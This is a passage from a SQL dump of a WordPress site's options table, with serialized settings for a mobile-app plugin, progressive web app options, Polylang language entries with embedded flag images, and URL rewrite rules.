us</strong></p>\n</body></html>\";}}s:4:\"meta\";a:0:{}}i:5;a:4:{s:4:\"type\";s:4:\"menu\";s:5:\"title\";s:10:\"Contact us\";s:4:\"data\";a:2:{i:0;a:4:{s:5:\"image\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/whatsapp.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:121;s:6:\"height\";i:121;}s:5:\"title\";s:16:\"Chat on whatsapp\";s:6:\"action\";a:2:{s:4:\"type\";s:8:\"OPEN_URL\";s:6:\"params\";a:1:{s:3:\"url\";s:81:\"https://api.whatsapp.com/send?phone=919778178955&text=Hola%20team%20at%20appmaker\";}}}i:1;a:4:{s:5:\"image\";s:61:\"http://demo.shopilder.com/wp-content/uploads/2019/07/call.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:121;s:6:\"height\";i:121;}s:5:\"title\";s:7:\"Call us\";s:6:\"action\";a:2:{s:4:\"type\";s:8:\"OPEN_URL\";s:6:\"params\";a:1:{s:3:\"url\";s:17:\"tel:+919778178955\";}}}}s:4:\"meta\";a:0:{}}}s:4:\"hash\";s:32:\"a3d63dcbe8c074c9135c2217f96de6a2\";}','yes'),(26736,'appmaker_wc_inAppPages__inAppPages','a:2:{s:4:\"home\";a:3:{s:2:\"id\";s:4:\"home\";s:5:\"label\";s:4:\"Home\";s:3:\"key\";s:4:\"home\";}s:6:\"lH4WAx\";a:3:{s:2:\"id\";s:6:\"lH4WAx\";s:5:\"label\";s:8:\"New Page\";s:3:\"key\";s:6:\"lH4WAx\";}}','yes'),(26769,'appmaker_wc_inAppPages_lH4WAx','O:8:\"stdClass\":6:{s:8:\"language\";s:7:\"default\";s:8:\"parentID\";b:0;s:5:\"title\";s:8:\"New Page\";s:7:\"widgets\";a:0:{}s:4:\"type\";s:6:\"NORMAL\";s:2:\"id\";s:6:\"lH4WAx\";}','no'),(26770,'appmaker_wc_inAppPages_lH4WAx_app','a:4:{s:2:\"id\";s:6:\"lH4WAx\";s:5:\"title\";s:8:\"New Page\";s:7:\"widgets\";a:0:{}s:4:\"hash\";s:32:\"f96cda4dfcfbe049fe652af1cde0d75b\";}','no'),(26852,'canvas-ps_private_messages','','yes'),(26853,'canvas-ps_friends','','yes'),(26854,'canvas-ps_mentions_comments','','yes'),(26855,'canvas-ps_mentions_posts','','yes'),(26856,'canvas-db-version','4','yes'),(26859,'canvas-api_version','6','yes'),(26862,'canvas-push_log_name','mangomitra.in-canvaspush70210791.txt','yes'),(26983,'pwp-settings','a:33:{s:16:\"installable-mode\";s:6:\"normal\";s:21:\"installable-pageloads\";s:1:\"2\";s:19:\"installable-onclick\";s:0:\"\";s:13:\"manifest-name\";s:11:\"Mango Mitra\";s:19:\"manifest-short-name\";s:11:\"Mango Mitra\";s:17:\"manifest-starturl\";s:22:\"https://mangomitra.in/\";s:20:\"manifest-description\";s:0:\"\";s:16:\"manifest-display\";s:10:\"standalone\";s:20:\"manifest-orientation\";s:8:\"portrait\";s:20:\"manifest-theme-color\";s:7:\"#46aa34\";s:25:\"manifest-background-color\";s:7:\"#ffffff\";s:28:\"pwp-tracking-starturl-source\";s:0:\"\";s:28:\"pwp-tracking-starturl-medium\";s:0:\"\";s:30:\"pwp-tracking-starturl-campaign\";s:0:\"\";s:26:\"pwp-tracking-starturl-term\";s:0:\"\";s:29:\"pwp-tracking-starturl-content\";s:0:\"\";s:12:\"offline-page\";i:560;s:15:\"offline-content\";s:0:\"\";s:17:\"offline-analytics\";b:0;s:24:\"offline-strategy-default\";s:12:\"networkFirst\";s:23:\"offline-strategy-static\";s:20:\"staleWhileRevalidate\";s:23:\"offline-strategy-images\";s:10:\"cacheFirst\";s:22:\"offline-strategy-fonts\";s:10:\"cacheFirst\";s:21:\"offline-strategy-rest\";s:11:\"networkOnly\";s:17:\"offline-indicator\";b:0;s:22:\"offline-indicator-text\";s:24:\"you\'re currently offline\";s:26:\"offline-indicator-position\";s:6:\"bottom\";s:28:\"offline-indicator-color-text\";s:7:\"#ffffff\";s:34:\"offline-indicator-color-background\";s:7:\"#000000\";s:18:\"firebase-serverkey\";s:0:\"\";s:17:\"firebase-senderid\";s:0:\"\";s:24:\"tracking-starturl-source\";s:14:\"pwa-homescreen\";s:23:\"tracking-pushurl-source\";s:20:\"pwa-pushnotification\";}','yes'),(32953,'polylang','a:14:{s:7:\"browser\";i:0;s:7:\"rewrite\";i:1;s:12:\"hide_default\";i:1;s:10:\"force_lang\";i:1;s:13:\"redirect_lang\";i:0;s:13:\"media_support\";b:1;s:9:\"uninstall\";i:0;s:4:\"sync\";a:0:{}s:10:\"post_types\";a:0:{}s:10:\"taxonomies\";a:0:{}s:7:\"domains\";a:0:{}s:7:\"version\";s:5:\"3.1.4\";s:16:\"first_activation\";i:1644814190;s:12:\"default_lang\";s:2:\"te\";}','yes'),(32954,'polylang_wpml_strings','a:1:{s:32:\"bb9499deb4d92ad2bf4c504ca5229f84\";a:5:{s:7:\"context\";s:23:\"flexible-product-fields\";s:4:\"name\";s:7:\"message\";s:6:\"string\";s:7:\"message\";s:9:\"multiline\";b:1;s:3:\"icl\";b:1;}}','yes'),(32958,'widget_polylang','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(33151,'plugin_activation_flexible-product-fields/flexible-product-fields.php','2022-02-14 11:13:49','yes'),(33168,'flexible-product-fields_activation','1644817687','yes');
INSERT INTO `wp_options` VALUES (33332,'_transient_pll_languages_list','a:8:{i:0;a:24:{s:7:\"term_id\";i:91;s:4:\"name\";s:18:\"తెలుగు\";s:4:\"slug\";s:2:\"te\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:91;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:92;s:19:\"tl_term_taxonomy_id\";i:92;s:8:\"tl_count\";i:0;s:6:\"locale\";s:2:\"te\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:2:\"te\";s:8:\"facebook\";s:5:\"te_IN\";s:8:\"home_url\";s:22:\"https://mangomitra.in/\";s:10:\"search_url\";s:22:\"https://mangomitra.in/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"958\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"in\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/in.png\";s:4:\"flag\";s:511:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAjVBMVEX/vwD5tADyqQDrnAD95Hr74XP53mr932D83Vj72k7610P61TT30Cn+7aX954zXzpalrbmiq7bnsgD8/Pz9/v6bq9bIzeT29/f09PXk5ea9wt2Bj8OKn8+ElssAcwCIxIhnsmdfrF9XqFdQpFBEn0Q5mDoAIgAAbwCAv4AAGQAAZQB1uHUAVwAARAAANACRhc+AAAAAVElEQVR4AQXBAU4CQRRAsb6db7Jg9P4XlRAIs7YBRCiDJMlrWIkkW99HqPZD9u+cuTh0naLJBV/1Dg6gZQfmXpQknzluN0oS1qx9Lv5IyhjyE08W/yjQDpdmVRfaAAAAAElFTkSuQmCC\" alt=\"తెలుగు\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}i:1;a:24:{s:7:\"term_id\";i:93;s:4:\"name\";s:15:\"தமிழ்\";s:4:\"slug\";s:2:\"ta\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:93;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:94;s:19:\"tl_term_taxonomy_id\";i:94;s:8:\"tl_count\";i:0;s:6:\"locale\";s:5:\"ta_IN\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:5:\"ta-IN\";s:8:\"facebook\";s:5:\"ta_IN\";s:8:\"home_url\";s:25:\"https://mangomitra.in/ta/\";s:10:\"search_url\";s:25:\"https://mangomitra.in/ta/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"959\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"in\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/in.png\";s:4:\"flag\";s:508:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAjVBMVEX/vwD5tADyqQDrnAD95Hr74XP53mr932D83Vj72k7610P61TT30Cn+7aX954zXzpalrbmiq7bnsgD8/Pz9/v6bq9bIzeT29/f09PXk5ea9wt2Bj8OKn8+ElssAcwCIxIhnsmdfrF9XqFdQpFBEn0Q5mDoAIgAAbwCAv4AAGQAAZQB1uHUAVwAARAAANACRhc+AAAAAVElEQVR4AQXBAU4CQRRAsb6db7Jg9P4XlRAIs7YBRCiDJMlrWIkkW99HqPZD9u+cuTh0naLJBV/1Dg6gZQfmXpQknzluN0oS1qx9Lv5IyhjyE08W/yjQDpdmVRfaAAAAAElFTkSuQmCC\" alt=\"தமிழ்\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}i:2;a:24:{s:7:\"term_id\";i:95;s:4:\"name\";s:18:\"हिन्दी\";s:4:\"slug\";s:2:\"hi\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:95;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:96;s:19:\"tl_term_taxonomy_id\";i:96;s:8:\"tl_count\";i:0;s:6:\"locale\";s:5:\"hi_IN\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:5:\"hi-IN\";s:8:\"facebook\";s:5:\"hi_IN\";s:8:\"home_url\";s:25:\"https://mangomitra.in/hi/\";s:10:\"search_url\";s:25:\"https://mangomitra.in/hi/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"960\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"in\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/in.png\";s:4:\"flag\";s:511:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAjVBMVEX/vwD5tADyqQDrnAD95Hr74XP53mr932D83Vj72k7610P61TT30Cn+7aX954zXzpalrbmiq7bnsgD8/Pz9/v6bq9bIzeT29/f09PXk5ea9wt2Bj8OKn8+ElssAcwCIxIhnsmdfrF9XqFdQpFBEn0Q5mDoAIgAAbwCAv4AAGQAAZQB1uHUAVwAARAAANACRhc+AAAAAVElEQVR4AQXBAU4CQRRAsb6db7Jg9P4XlRAIs7YBRCiDJMlrWIkkW99HqPZD9u+cuTh0naLJBV/1Dg6gZQfmXpQknzluN0oS1qx9Lv5IyhjyE08W/yjQDpdmVRfaAAAAAElFTkSuQmCC\" alt=\"हिन्दी\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}i:3;a:24:{s:7:\"term_id\";i:97;s:4:\"name\";s:18:\"ਪੰਜਾਬੀ\";s:4:\"slug\";s:2:\"pa\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:97;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:98;s:19:\"tl_term_taxonomy_id\";i:98;s:8:\"tl_count\";i:0;s:6:\"locale\";s:5:\"pa_IN\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:5:\"pa-IN\";s:8:\"facebook\";s:5:\"pa_IN\";s:8:\"home_url\";s:25:\"https://mangomitra.in/pa/\";s:10:\"search_url\";s:25:\"https://mangomitra.in/pa/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"961\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"in\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/in.png\";s:4:\"flag\";s:511:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAjVBMVEX/vwD5tADyqQDrnAD95Hr74XP53mr932D83Vj72k7610P61TT30Cn+7aX954zXzpalrbmiq7bnsgD8/Pz9/v6bq9bIzeT29/f09PXk5ea9wt2Bj8OKn8+ElssAcwCIxIhnsmdfrF9XqFdQpFBEn0Q5mDoAIgAAbwCAv4AAGQAAZQB1uHUAVwAARAAANACRhc+AAAAAVElEQVR4AQXBAU4CQRRAsb6db7Jg9P4XlRAIs7YBRCiDJMlrWIkkW99HqPZD9u+cuTh0naLJBV/1Dg6gZQfmXpQknzluN0oS1qx9Lv5IyhjyE08W/yjQDpdmVRfaAAAAAElFTkSuQmCC\" alt=\"ਪੰਜਾਬੀ\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}i:4;a:24:{s:7:\"term_id\";i:99;s:4:\"name\";s:18:\"മലയാളം\";s:4:\"slug\";s:2:\"ml\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:99;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:100;s:19:\"tl_term_taxonomy_id\";i:100;s:8:\"tl_count\";i:0;s:6:\"locale\";s:5:\"ml_IN\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:5:\"ml-IN\";s:8:\"facebook\";s:5:\"ml_IN\";s:8:\"home_url\";s:25:\"https://mangomitra.in/ml/\";s:10:\"search_url\";s:25:\"https://mangomitra.in/ml/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"962\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"in\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/in.png\";s:4:\"flag\";s:511:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAjVBMVEX/vwD5tADyqQDrnAD95Hr74XP53mr932D83Vj72k7610P61TT30Cn+7aX954zXzpalrbmiq7bnsgD8/Pz9/v6bq9bIzeT29/f09PXk5ea9wt2Bj8OKn8+ElssAcwCIxIhnsmdfrF9XqFdQpFBEn0Q5mDoAIgAAbwCAv4AAGQAAZQB1uHUAVwAARAAANACRhc+AAAAAVElEQVR4AQXBAU4CQRRAsb6db7Jg9P4XlRAIs7YBRCiDJMlrWIkkW99HqPZD9u+cuTh0naLJBV/1Dg6gZQfmXpQknzluN0oS1qx9Lv5IyhjyE08W/yjQDpdmVRfaAAAAAElFTkSuQmCC\" alt=\"മലയാളം\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}i:5;a:24:{s:7:\"term_id\";i:101;s:4:\"name\";s:15:\"ಕನ್ನಡ\";s:4:\"slug\";s:2:\"kn\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:101;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:102;s:19:\"tl_term_taxonomy_id\";i:102;s:8:\"tl_count\";i:0;s:6:\"locale\";s:2:\"kn\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:2:\"kn\";s:8:\"facebook\";s:5:\"kn_IN\";s:8:\"home_url\";s:25:\"https://mangomitra.in/kn/\";s:10:\"search_url\";s:25:\"https://mangomitra.in/kn/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"963\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"in\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/in.png\";s:4:\"flag\";s:508:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAjVBMVEX/vwD5tADyqQDrnAD95Hr74XP53mr932D83Vj72k7610P61TT30Cn+7aX954zXzpalrbmiq7bnsgD8/Pz9/v6bq9bIzeT29/f09PXk5ea9wt2Bj8OKn8+ElssAcwCIxIhnsmdfrF9XqFdQpFBEn0Q5mDoAIgAAbwCAv4AAGQAAZQB1uHUAVwAARAAANACRhc+AAAAAVElEQVR4AQXBAU4CQRRAsb6db7Jg9P4XlRAIs7YBRCiDJMlrWIkkW99HqPZD9u+cuTh0naLJBV/1Dg6gZQfmXpQknzluN0oS1qx9Lv5IyhjyE08W/yjQDpdmVRfaAAAAAElFTkSuQmCC\" alt=\"ಕನ್ನಡ\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}i:6;a:24:{s:7:\"term_id\";i:103;s:4:\"name\";s:21:\"অসমীয়া\";s:4:\"slug\";s:2:\"as\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:103;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:104;s:19:\"tl_term_taxonomy_id\";i:104;s:8:\"tl_count\";i:0;s:6:\"locale\";s:2:\"as\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:2:\"as\";s:8:\"facebook\";s:5:\"as_IN\";s:8:\"home_url\";s:25:\"https://mangomitra.in/as/\";s:10:\"search_url\";s:25:\"https://mangomitra.in/as/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"964\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"in\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/in.png\";s:4:\"flag\";s:514:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAjVBMVEX/vwD5tADyqQDrnAD95Hr74XP53mr932D83Vj72k7610P61TT30Cn+7aX954zXzpalrbmiq7bnsgD8/Pz9/v6bq9bIzeT29/f09PXk5ea9wt2Bj8OKn8+ElssAcwCIxIhnsmdfrF9XqFdQpFBEn0Q5mDoAIgAAbwCAv4AAGQAAZQB1uHUAVwAARAAANACRhc+AAAAAVElEQVR4AQXBAU4CQRRAsb6db7Jg9P4XlRAIs7YBRCiDJMlrWIkkW99HqPZD9u+cuTh0naLJBV/1Dg6gZQfmXpQknzluN0oS1qx9Lv5IyhjyE08W/yjQDpdmVRfaAAAAAElFTkSuQmCC\" alt=\"অসমীয়া\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}i:7;a:24:{s:7:\"term_id\";i:105;s:4:\"name\";s:7:\"English\";s:4:\"slug\";s:2:\"en\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:105;s:5:\"count\";i:0;s:10:\"tl_term_id\";i:106;s:19:\"tl_term_taxonomy_id\";i:106;s:8:\"tl_count\";i:1;s:6:\"locale\";s:5:\"en_US\";s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:5:\"en-US\";s:8:\"facebook\";s:5:\"en_US\";s:8:\"home_url\";s:25:\"https://mangomitra.in/en/\";s:10:\"search_url\";s:25:\"https://mangomitra.in/en/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"967\";s:13:\"page_on_front\";b:0;s:14:\"page_for_posts\";b:0;s:9:\"flag_code\";s:2:\"us\";s:8:\"flag_url\";s:62:\"https://mangomitra.in/wp-content/plugins/polylang/flags/us.png\";s:4:\"flag\";s:576:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAMAAABBPP0LAAAAmVBMVEViZsViZMJiYrf9gnL8eWrlYkjgYkjZYkj8/PujwPybvPz4+PetraBEgfo+fvo3efkydfkqcvj8Y2T8UlL8Q0P8MzP9k4Hz8/Lu7u4DdPj9/VrKysI9fPoDc/EAZ7z7IiLHYkjp6ekCcOTk5OIASbfY/v21takAJrT5Dg6sYkjc3Nn94t2RkYD+y8KeYkjs/v7l5fz0dF22YkjWvcOLAAAAgElEQVR4AR2KNULFQBgGZ5J13KGGKvc/Cw1uPe62eb9+Jr1EUBFHSgxxjP2Eca6AfUSfVlUfBvm1Ui1bqafctqMndNkXpb01h5TLx4b6TIXgwOCHfjv+/Pz+5vPRw7txGWT2h6yO0/GaYltIp5PT1dEpLNPL/SdWjYjAAZtvRPgHJX4Xio+DSrkAAAAASUVORK5CYII=\" alt=\"English\" width=\"16\" height=\"11\" style=\"width: 16px; height: 11px;\" />\";s:15:\"custom_flag_url\";N;s:11:\"custom_flag\";N;}}','yes'),(33379,'rewrite_rules','a:95:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:12:\"sitemap\\.xml\";s:23:\"index.php?sitemap=index\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:41:\"index.php?&page_id=1373&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s: